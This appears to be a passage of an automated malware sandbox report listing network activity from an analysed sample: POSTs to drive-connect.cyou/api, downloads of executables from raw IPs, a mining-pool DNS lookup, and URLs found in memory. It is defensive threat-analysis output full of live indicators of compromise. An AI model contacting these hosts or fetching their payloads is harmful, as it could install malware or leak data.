                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: drive-connect.cyou
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UHD47JNECTF0DSQCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18150Host: drive-connect.cyou
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=R2X84ROL5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8729Host: drive-connect.cyou
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0B1Z4GPHUWWQL18MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20424Host: drive-connect.cyou
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SQ46N4FHXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1281Host: drive-connect.cyou
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WE5MSLXXG6NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552125Host: drive-connect.cyou
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: drive-connect.cyou
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drive-connect.cyou
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: drive-connect.cyou
                            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z9LQRK575GYQ5CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18138Host: drive-connect.cyou
                            Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECE0C0 recv,recv,recv,recv,0_2_00ECE0C0
                            Source: global trafficHTTP traffic detected: GET /77/uploads/Odavmyskfc.pdf HTTP/1.1Host: woo097878781.winConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /P.txt HTTP/1.1Accept: */*Connection: closeHost: woo097878781.winUser-Agent: cpp-httplib/0.12.6
                            Source: global trafficHTTP traffic detected: GET /77/uploads/Odavmyskfc.pdf HTTP/1.1Host: woo097878781.winConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                            Source: global trafficHTTP traffic detected: GET /files/5131681669/sUSFJjY.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /files/5444530229/XpAg0vN.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /kJZQfgRLErzqwUgdaDCN1734167391?argument=NqSXGMT29bBsoKvm1734307336 HTTP/1.1Host: home.fivegr5sb.topAccept: */*
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /files/flava/random.exe HTTP/1.1Host: 31.41.244.11
                            Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Tue, 10 Dec 2024 00:01:52 GMTIf-None-Match: "675784f0-43baf8"
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Wed, 11 Dec 2024 08:22:24 GMTIf-None-Match: "67594bc0-b1a00"
                            Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
                            Source: global trafficDNS traffic detected: DNS query: woo097878781.win
                            Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
                            Source: global trafficDNS traffic detected: DNS query: drive-connect.cyou
                            Source: global trafficDNS traffic detected: DNS query: httpbin.org
                            Source: global trafficDNS traffic detected: DNS query: home.fivegr5sb.top
                            Source: global trafficDNS traffic detected: DNS query: www.google.com
                            Source: global trafficDNS traffic detected: DNS query: fivegr5sb.top
                            Source: global trafficDNS traffic detected: DNS query: example.org
                            Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
                            Source: unknownHTTP traffic detected: POST /66/api/endpoint.php HTTP/1.1Accept: */*Connection: closeContent-Length: 336Content-Type: application/jsonHost: woo097878781.winUser-Agent: cpp-httplib/0.12.6
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                            Source: powershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                            Source: powershell.exe, 0000000A.00000002.2572181326.00000190DDE78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2601597145.00000190F5F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: powershell.exe, 0000000A.00000002.2572181326.00000190DDE78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: sUSFJjY.exe, 00000006.00000002.2619824711.0000026950C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2572181326.00000190DDC51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 0000000A.00000002.2572181326.00000190DDE78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: ae91ff4264.exe, 0000000D.00000000.2589286710.0000000000423000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                            Source: powershell.exe, 0000000A.00000002.2572181326.00000190DDE78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2601597145.00000190F5F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: powershell.exe, 0000000A.00000002.2601597145.00000190F5F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                            Source: cad620f7d1.exe, 00000024.00000003.2910763033.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                            Source: cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: powershell.exe, 0000000A.00000002.2572181326.00000190DDC51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                            Source: cad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                            Source: cad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                            Source: cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: cad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                            Source: cad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                            Source: powershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: cad620f7d1.exe, 00000024.00000003.2850001201.0000000000B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/
                            Source: cad620f7d1.exe, 00000024.00000003.3014208092.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000002.3122773825.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3053058436.0000000000B9E000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3054039751.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3036675220.0000000000B9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/38
                            Source: cad620f7d1.exe, 00000024.00000003.2850001201.0000000000B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/:M
                            Source: cad620f7d1.exe, 00000024.00000003.3014208092.0000000000B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/;8
                            Source: cad620f7d1.exe, 00000024.00000003.3053058436.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3093791267.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3094834817.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3054039751.0000000000BAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/R
                            Source: cad620f7d1.exe, 00000024.00000003.2850001201.0000000000B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/api
                            Source: cad620f7d1.exe, 00000024.00000003.2966933877.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2967091046.0000000000B9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/apiD
                            Source: cad620f7d1.exe, 00000024.00000003.3036675220.0000000000B9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/apio
                            Source: cad620f7d1.exe, 00000024.00000003.3093791267.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000002.3122773825.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3094363782.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou/grou
                            Source: cad620f7d1.exe, 00000024.00000003.3053058436.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3057715788.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.3054039751.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive-connect.cyou:443/api
                            Source: cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: powershell.exe, 0000000A.00000002.2572181326.00000190DDE78000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2601597145.00000190F5F88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                            Source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                            Source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                            Source: cad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                            Source: powershell.exe, 0000000A.00000002.2587367775.00000190EDCBD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                            Source: sUSFJjY.exe, 00000006.00000002.2619824711.0000026950D01000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                            Source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                            Source: cad620f7d1.exe, 00000024.00000003.2797139581.000000000324E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                            Source: cad620f7d1.exe, 00000024.00000003.2797139581.000000000324C000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2849928748.0000000003245000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2838150959.0000000003245000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                            Source: cad620f7d1.exe, 00000024.00000003.2797324014.0000000003220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                            Source: cad620f7d1.exe, 00000024.00000003.2797139581.000000000324C000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2849928748.0000000003245000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2838150959.0000000003245000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                            Source: cad620f7d1.exe, 00000024.00000003.2797324014.0000000003220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                            Source: sUSFJjY.exe, 00000006.00000002.2619824711.0000026950C31000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win
                            Source: explorer.exe, 00000017.00000003.3848708673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.0000000000895000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3308227661.0000000000895000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2606864640.0000000000824000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2667541330.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2664467654.0000000000892000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.php
                            Source: explorer.exe, 00000017.00000003.3848708673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2667541330.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpI
                            Source: explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpJ
                            Source: explorer.exe, 00000017.00000003.2606864640.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phptjalvjhtgxjbffgq
                            Source: explorer.exe, 00000017.00000003.3848708673.0000000000895000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3308227661.0000000000895000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2664467654.0000000000892000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/66/api/endpoint.phpx
                            Source: sUSFJjY.exe, 00000006.00000002.2619824711.0000026950C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/77/uploads/Odavmyskfc.pdf
